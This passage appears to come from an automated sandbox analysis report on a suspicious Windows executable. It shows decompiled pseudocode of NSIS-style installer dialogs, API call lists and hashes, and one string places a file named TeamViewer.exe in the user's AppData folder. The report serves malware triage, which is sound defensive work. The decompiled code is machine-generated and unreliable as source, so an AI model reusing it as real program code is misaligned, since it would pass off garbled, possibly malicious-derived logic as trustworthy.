                                                                                                                        											}
                                                                                                                        											if((_t291 & 0x00000040) == 0) {
                                                                                                                        												_t206 = (_t291 & 0x00000001) + 1;
                                                                                                                        												if((_t291 & 0x00000010) != 0) {
                                                                                                                        													_t206 = _t206 + 3;
                                                                                                                        												}
                                                                                                                        											} else {
                                                                                                                        												_t206 = 3;
                                                                                                                        											}
                                                                                                                        											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                                                                        											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                                                        											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                                                                        										}
                                                                                                                        										_v16 = _v16 + 1;
                                                                                                                        										_t281 =  &(_t281[0x106]);
                                                                                                                        									} while (_v16 <  *0x423ecc);
                                                                                                                        									goto L84;
                                                                                                                        								} else {
                                                                                                                        									_t282 = E004012E2( *0x420494);
                                                                                                                        									E00401299(_t282);
                                                                                                                        									_t217 = 0;
                                                                                                                        									_t289 = 0;
                                                                                                                        									if(_t282 <= _t315) {
                                                                                                                        										L72:
                                                                                                                        										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                                                                        										_a16 = _t282;
                                                                                                                        										_a8 = 0x420;
                                                                                                                        										goto L73;
                                                                                                                        									} else {
                                                                                                                        										goto L69;
                                                                                                                        									}
                                                                                                                        									do {
                                                                                                                        										L69:
                                                                                                                        										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                                                                        											_t289 = _t289 + 1;
                                                                                                                        										}
                                                                                                                        										_t217 = _t217 + 1;
                                                                                                                        									} while (_t217 < _t282);
                                                                                                                        									goto L72;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                        							goto L89;
                                                                                                                        						} else {
                                                                                                                        							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                                                                        							if(_t227 == 0xffffffff) {
                                                                                                                        								goto L89;
                                                                                                                        							}
                                                                                                                        							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                                                                        							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                                                                        								_t283 = 0x20;
                                                                                                                        							}
                                                                                                                        							E00401299(_t283);
                                                                                                                        							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                                                                        							_a12 = 1;
                                                                                                                        							_a16 = _t315;
                                                                                                                        							_a8 = 0x40f;
                                                                                                                        							goto L56;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					 *0x423f00 = _a4;
                                                                                                                        					_t285 = 2;
                                                                                                                        					_v28 = 0;
                                                                                                                        					_v16 = _t285;
                                                                                                                        					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
                                                                                                                        					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                                                                                                                        					 *0x420488 =  *0x420488 | 0xffffffff;
                                                                                                                        					_v24 = _t250;
                                                                                                                        					_t251 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
                                                                                                                        					 *0x420490 = _t251;
                                                                                                                        					_t252 =  *0x407034(0x10, 0x10, 0x21, 6, 0);
                                                                                                                        					 *0x42047c = _t252;
                                                                                                                        					 *0x407028(_t252, _v24, 0xff00ff);
                                                                                                                        					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
                                                                                                                        					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                        						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                                                        					}
                                                                                                                        					DeleteObject(_v24);
                                                                                                                        					_t286 = 0;
                                                                                                                        					do {
                                                                                                                        						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                                                                        						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                                                                        							if(_t286 != 0x20) {
                                                                                                                        								_v16 = _t315;
                                                                                                                        							}
                                                                                                                        							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                                                                                        						}
                                                                                                                        						_t286 = _t286 + 1;
                                                                                                                        					} while (_t286 < 0x21);
                                                                                                                        					_t317 = _a16;
                                                                                                                        					_t287 = _v16;
                                                                                                                        					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                                                                        					_push(0x15);
                                                                                                                        					E00403F18(_a4);
                                                                                                                        					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                                                                        					_push(0x16);
                                                                                                                        					E00403F18(_a4);
                                                                                                                        					_t318 = 0;
                                                                                                                        					_t288 = 0;
                                                                                                                        					if( *0x423ecc <= 0) {
                                                                                                                        						L19:
                                                                                                                        						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                        						goto L20;
                                                                                                                        					} else {
                                                                                                                        						_t311 = _v32 + 8;
                                                                                                                        						_v24 = _t311;
                                                                                                                        						do {
                                                                                                                        							_t268 = _t311 + 0x10;
                                                                                                                        							if( *_t268 != 0) {
                                                                                                                        								_v60 = _t268;
                                                                                                                        								_t269 =  *_t311;
                                                                                                                        								_t302 = 0x20;
                                                                                                                        								_v84 = _t288;
                                                                                                                        								_v80 = 0xffff0002;
                                                                                                                        								_v76 = 0xd;
                                                                                                                        								_v64 = _t302;
                                                                                                                        								_v40 = _t318;
                                                                                                                        								_v68 = _t269 & _t302;
                                                                                                                        								if((_t269 & 0x00000002) == 0) {
                                                                                                                        									if((_t269 & 0x00000004) == 0) {
                                                                                                                        										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                                        									} else {
                                                                                                                        										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									_v76 = 0x4d;
                                                                                                                        									_v44 = 1;
                                                                                                                        									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                                        									_v28 = 1;
                                                                                                                        									 *( *0x420494 + _t318 * 4) = _t274;
                                                                                                                        									_t288 =  *( *0x420494 + _t318 * 4);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							_t318 = _t318 + 1;
                                                                                                                        							_t311 = _v24 + 0x418;
                                                                                                                        							_v24 = _t311;
                                                                                                                        						} while (_t318 <  *0x423ecc);
                                                                                                                        						if(_v28 != 0) {
                                                                                                                        							L20:
                                                                                                                        							if(_v16 != 0) {
                                                                                                                        								E00403F4D(_v8);
                                                                                                                        								_t280 = _v32;
                                                                                                                        								_t315 = 0;
                                                                                                                        								goto L23;
                                                                                                                        							} else {
                                                                                                                        								ShowWindow(_v12, 5);
                                                                                                                        								E00403F4D(_v12);
                                                                                                                        								L89:
                                                                                                                        								return E00403F7F(_a8, _a12, _a16);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L19;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}



























































                                                                                                                        0x004049fb
                                                                                                                        0x004049fe
                                                                                                                        0x00404a3a
                                                                                                                        0x00404a63
                                                                                                                        0x00404a3c
                                                                                                                        0x00404a49
                                                                                                                        0x00404a49
                                                                                                                        0x00404a00
                                                                                                                        0x00404a03
                                                                                                                        0x00404a12
                                                                                                                        0x00404a1c
                                                                                                                        0x00404a24
                                                                                                                        0x00404a2b
                                                                                                                        0x00404a33
                                                                                                                        0x00404a33
                                                                                                                        0x004049fe
                                                                                                                        0x00404a69
                                                                                                                        0x00404a6a
                                                                                                                        0x00404a76
                                                                                                                        0x00404a76
                                                                                                                        0x00404a83
                                                                                                                        0x00404a9e
                                                                                                                        0x00404aa2
                                                                                                                        0x00404abf
                                                                                                                        0x00404ac4
                                                                                                                        0x00404ac7
                                                                                                                        0x00000000
                                                                                                                        0x00404aa4
                                                                                                                        0x00404aa9
                                                                                                                        0x00404ab2
                                                                                                                        0x00404e3f
                                                                                                                        0x00404e51
                                                                                                                        0x00404e51
                                                                                                                        0x00404aa2
                                                                                                                        0x00000000
                                                                                                                        0x00404a83
                                                                                                                        0x004049bb

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 0040486A
                                                                                                                        • GetDlgItem.USER32 ref: 00404877
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
                                                                                                                        • LoadBitmapA.USER32 ref: 004048D6
                                                                                                                        • SetWindowLongA.USER32 ref: 004048F0
                                                                                                                        • 74191AB0.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
                                                                                                                        • 741923B0.COMCTL32(00000000,?,00FF00FF), ref: 00404918
                                                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
                                                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
                                                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
                                                                                                                        • DeleteObject.GDI32(?), ref: 00404950
                                                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
                                                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
                                                                                                                        • GetWindowLongA.USER32 ref: 00404A8A
                                                                                                                        • SetWindowLongA.USER32 ref: 00404A98
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404AA9
                                                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
                                                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
                                                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
                                                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
                                                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
                                                                                                                        • 74191F60.COMCTL32(?), ref: 00404C85
                                                                                                                        • GlobalFree.KERNEL32 ref: 00404C95
                                                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
                                                                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
                                                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404E2B
                                                                                                                        • GetDlgItem.USER32 ref: 00404E36
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404E3D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemLongShow$74191Global$741923AllocBitmapDeleteFreeInvalidateLoadObjectRect
                                                                                                                        • String ID: $M$N
                                                                                                                        • API String ID: 1539750561-813528018
                                                                                                                        • Opcode ID: 9d7127013aa6371c945dd951bd4b8b5fe2ec9ac9385b3123730207c7727c871c
                                                                                                                        • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                                                        • Opcode Fuzzy Hash: 9d7127013aa6371c945dd951bd4b8b5fe2ec9ac9385b3123730207c7727c871c
                                                                                                                        • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 81%
                                                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                        				struct tagLOGBRUSH _v16;
                                                                                                                        				struct tagRECT _v32;
                                                                                                                        				struct tagPAINTSTRUCT _v96;
                                                                                                                        				struct HDC__* _t70;
                                                                                                                        				struct HBRUSH__* _t87;
                                                                                                                        				struct HFONT__* _t94;
                                                                                                                        				void* _t102;
                                                                                                                        				signed int _t126;
                                                                                                                        				struct HDC__* _t128;
                                                                                                                        				intOrPtr _t130;
                                                                                                                        
                                                                                                                        				if(_a8 == 0xf) {
                                                                                                                        					_t130 =  *0x423eb0;
                                                                                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                        					_a8 = _t70;
                                                                                                                        					GetClientRect(_a4,  &_v32);
                                                                                                                        					_t126 = _v32.bottom;
                                                                                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                        					while(_v32.top < _t126) {
                                                                                                                        						_a12 = _t126 - _v32.top;
                                                                                                                        						asm("cdq");
                                                                                                                        						asm("cdq");
                                                                                                                        						asm("cdq");
                                                                                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                        						_v32.bottom = _v32.bottom + 4;
                                                                                                                        						_a16 = _t87;
                                                                                                                        						FillRect(_a8,  &_v32, _t87);
                                                                                                                        						DeleteObject(_a16);
                                                                                                                        						_v32.top = _v32.top + 4;
                                                                                                                        					}
                                                                                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                        						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                                        						_a16 = _t94;
                                                                                                                        						if(_t94 != 0) {
                                                                                                                        							_t128 = _a8;
                                                                                                                        							_v32.left = 0x10;
                                                                                                                        							_v32.top = 8;
                                                                                                                        							SetBkMode(_t128, 1);
                                                                                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                        							_a8 = SelectObject(_t128, _a16);
                                                                                                                        							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
                                                                                                                        							SelectObject(_t128, _a8);
                                                                                                                        							DeleteObject(_a16);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					EndPaint(_a4,  &_v96);
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t102 = _a16;
                                                                                                                        				if(_a8 == 0x46) {
                                                                                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
                                                                                                                        				}
                                                                                                                        				return  *0x407248(_a4, _a8, _a12, _t102);
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • NtdllDefWindowProc_A.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32 ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeNtdllProc_Window
                                                                                                                        • String ID: F
                                                                                                                        • API String ID: 2222205020-1304234792
                                                                                                                        • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                                        • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                                                        • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                                        • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 75%
                                                                                                                        			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                        				signed int _v8;
                                                                                                                        				struct HWND__* _v12;
                                                                                                                        				long _v16;
                                                                                                                        				long _v20;
                                                                                                                        				char _v24;
                                                                                                                        				long _v28;
                                                                                                                        				char _v32;
                                                                                                                        				intOrPtr _v36;
                                                                                                                        				long _v40;
                                                                                                                        				signed int _v44;
                                                                                                                        				CHAR* _v52;
                                                                                                                        				intOrPtr _v56;
                                                                                                                        				intOrPtr _v60;
                                                                                                                        				intOrPtr _v64;
                                                                                                                        				intOrPtr _v68;
                                                                                                                        				void _v72;
                                                                                                                        				struct _browseinfo _v76;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				intOrPtr _t81;
                                                                                                                        				long _t86;
                                                                                                                        				signed char* _t88;
                                                                                                                        				void* _t94;
                                                                                                                        				signed int _t95;
                                                                                                                        				signed short _t113;
                                                                                                                        				signed int _t117;
                                                                                                                        				struct _ITEMIDLIST* _t123;
                                                                                                                        				intOrPtr* _t139;
                                                                                                                        				signed int* _t146;
                                                                                                                        				signed int _t149;
                                                                                                                        				signed int _t154;
                                                                                                                        				struct HWND__* _t160;
                                                                                                                        				CHAR* _t163;
                                                                                                                        				int _t164;
                                                                                                                        
                                                                                                                        				_t81 =  *0x41fc70;
                                                                                                                        				_v36 = _t81;
                                                                                                                        				_t163 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                                                                                                                        				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                                                                                                        				if(_a8 == 0x40b) {
                                                                                                                        					E0040540B(0x3fb, _t163);
                                                                                                                        					E00405DC8(_t163);
                                                                                                                        				}
                                                                                                                        				if(_a8 != 0x110) {
                                                                                                                        					L8:
                                                                                                                        					if(_a8 != 0x111) {
                                                                                                                        						L20:
                                                                                                                        						if(_a8 == 0x40f) {
                                                                                                                        							L22:
                                                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                                                        							_v12 = _v12 & 0x00000000;
                                                                                                                        							E0040540B(0x3fb, _t163);
                                                                                                                        							if(E0040573A(_t181, _t163) == 0) {
                                                                                                                        								_v8 = 1;
                                                                                                                        							}
                                                                                                                        							E00405B66(0x41f468, _t163);
                                                                                                                        							_t146 = 0;
                                                                                                                        							_t86 = E00405E88(0);
                                                                                                                        							_v16 = _t86;
                                                                                                                        							if(_t86 == 0) {
                                                                                                                        								L31:
                                                                                                                        								E00405B66(0x41f468, _t163);
                                                                                                                        								_t88 = E004056ED(0x41f468);
                                                                                                                        								if(_t88 != _t146) {
                                                                                                                        									 *_t88 =  *_t88 & 0x00000000;
                                                                                                                        								}
                                                                                                                        								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                                                                                                        									_t154 = _a8;
                                                                                                                        									goto L37;
                                                                                                                        								} else {
                                                                                                                        									_t164 = 0x400;
                                                                                                                        									_t154 = MulDiv(_v20 * _v28, _v16, 0x400);
                                                                                                                        									_v12 = 1;
                                                                                                                        									goto L38;
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								if(0 == 0x41f468) {
                                                                                                                        									L30:
                                                                                                                        									_t146 = 0;
                                                                                                                        									goto L31;
                                                                                                                        								} else {
                                                                                                                        									goto L26;
                                                                                                                        								}
                                                                                                                        								while(1) {
                                                                                                                        									L26:
                                                                                                                        									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
                                                                                                                        									if(_t113 != 0) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									if(_t146 != 0) {
                                                                                                                        										 *_t146 =  *_t146 & _t113;
                                                                                                                        									}
                                                                                                                        									_t146 = E004056A0(_t113, 0x41f468) - 1;
                                                                                                                        									 *_t146 = 0x5c;
                                                                                                                        									if(_t146 != 0x41f468) {
                                                                                                                        										continue;
                                                                                                                        									} else {
                                                                                                                        										goto L30;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t154 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                                                                        								_v12 = 1;
                                                                                                                        								_t146 = 0;
                                                                                                                        								L37:
                                                                                                                        								_t164 = 0x400;
                                                                                                                        								L38:
                                                                                                                        								_t94 = E004047A6(5);
                                                                                                                        								if(_v12 != _t146 && _t154 < _t94) {
                                                                                                                        									_v8 = 2;
                                                                                                                        								}
                                                                                                                        								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t146) {
                                                                                                                        									E004046F1(0x3ff, 0xfffffffb, _t94);
                                                                                                                        									if(_v12 == _t146) {
                                                                                                                        										SetDlgItemTextA(_a4, _t164, 0x41f458);
                                                                                                                        									} else {
                                                                                                                        										E004046F1(_t164, 0xfffffffc, _t154);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t95 = _v8;
                                                                                                                        								 *0x423f44 = _t95;
                                                                                                                        								if(_t95 == _t146) {
                                                                                                                        									_v8 = E0040140B(7);
                                                                                                                        								}
                                                                                                                        								if(( *(_v36 + 0x14) & _t164) != 0) {
                                                                                                                        									_v8 = _t146;
                                                                                                                        								}
                                                                                                                        								E00403F3A(0 | _v8 == _t146);
                                                                                                                        								if(_v8 == _t146 &&  *0x42048c == _t146) {
                                                                                                                        									E004042EB();
                                                                                                                        								}
                                                                                                                        								 *0x42048c = _t146;
                                                                                                                        								goto L53;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t181 = _a8 - 0x405;
                                                                                                                        						if(_a8 != 0x405) {
                                                                                                                        							goto L53;
                                                                                                                        						}
                                                                                                                        						goto L22;
                                                                                                                        					}
                                                                                                                        					_t117 = _a12 & 0x0000ffff;
                                                                                                                        					if(_t117 != 0x3fb) {
                                                                                                                        						L12:
                                                                                                                        						if(_t117 == 0x3e9) {
                                                                                                                        							_t149 = 7;
                                                                                                                        							memset( &_v72, 0, _t149 << 2);
                                                                                                                        							_v76 = _a4;
                                                                                                                        							_v68 = 0x4204a0;
                                                                                                                        							_v56 = E0040468B;
                                                                                                                        							_v52 = _t163;
                                                                                                                        							_v64 = E00405B88(0x3fb, 0x4204a0, _t163, 0x41f870, _v8);
                                                                                                                        							_v60 = 0x41;
                                                                                                                        							_t123 = SHBrowseForFolder( &_v76);
                                                                                                                        							if(_t123 == 0) {
                                                                                                                        								_a8 = 0x40f;
                                                                                                                        							} else {
                                                                                                                        								E00405659( *0x407278(_t123), _t163);
                                                                                                                        								_t127 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
                                                                                                                        								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t163 == 0x429400) {
                                                                                                                        									E00405B88(0x3fb, 0x4204a0, _t163, 0, _t127);
                                                                                                                        									_push(0x4204a0);
                                                                                                                        									_push(0x422e40);
                                                                                                                        									if( *0x4070f0() != 0) {
                                                                                                                        										_push(0x422e40);
                                                                                                                        										_push(_t163);
                                                                                                                        										L00405B82();
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								 *0x42048c =  &(( *0x42048c)[0]);
                                                                                                                        								SetDlgItemTextA(_a4, 0x3fb, _t163);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L20;
                                                                                                                        					}
                                                                                                                        					if(_a12 >> 0x10 != 0x300) {
                                                                                                                        						goto L53;
                                                                                                                        					}
                                                                                                                        					_a8 = 0x40f;
                                                                                                                        					goto L12;
                                                                                                                        				} else {
                                                                                                                        					_t160 = _a4;
                                                                                                                        					_v12 = GetDlgItem(_t160, 0x3fb);
                                                                                                                        					if(E004056C6(_t163) != 0 && E004056ED(_t163) == 0) {
                                                                                                                        						E00405659(_t141, _t163);
                                                                                                                        					}
                                                                                                                        					 *0x423678 = _t160;
                                                                                                                        					SetWindowTextA(_v12, _t163);
                                                                                                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                        					_push(1);
                                                                                                                        					E00403F18(_t160);
                                                                                                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                        					_push(0x14);
                                                                                                                        					E00403F18(_t160);
                                                                                                                        					E00403F4D(_v12);
                                                                                                                        					_t139 = E00405E88(7);
                                                                                                                        					if(_t139 == 0) {
                                                                                                                        						L53:
                                                                                                                        						return E00403F7F(_a8, _a12, _a16);
                                                                                                                        					}
                                                                                                                        					 *_t139(_v12, 1);
                                                                                                                        					goto L8;
                                                                                                                        				}
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 004043A2
                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                                                        • SHBrowseForFolder.SHELL32(?), ref: 00404484
                                                                                                                        • 762AA680.OLE32(00000000), ref: 0040448F
                                                                                                                        • lstrcmpi.KERNEL32 ref: 004044C1
                                                                                                                        • lstrcat.KERNEL32(?, "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"), ref: 004044CD
                                                                                                                        • SetDlgItemTextA.USER32 ref: 004044DD
                                                                                                                          • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                                                        • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$A680BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"$A
                                                                                                                        • API String ID: 1371326663-1470638881
                                                                                                                        • Opcode ID: 3cdee0d3b15a5f473c4b90c9f3f5b15abf96d87614e60a3eade95cc215b2791d
                                                                                                                        • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                                                        • Opcode Fuzzy Hash: 3cdee0d3b15a5f473c4b90c9f3f5b15abf96d87614e60a3eade95cc215b2791d
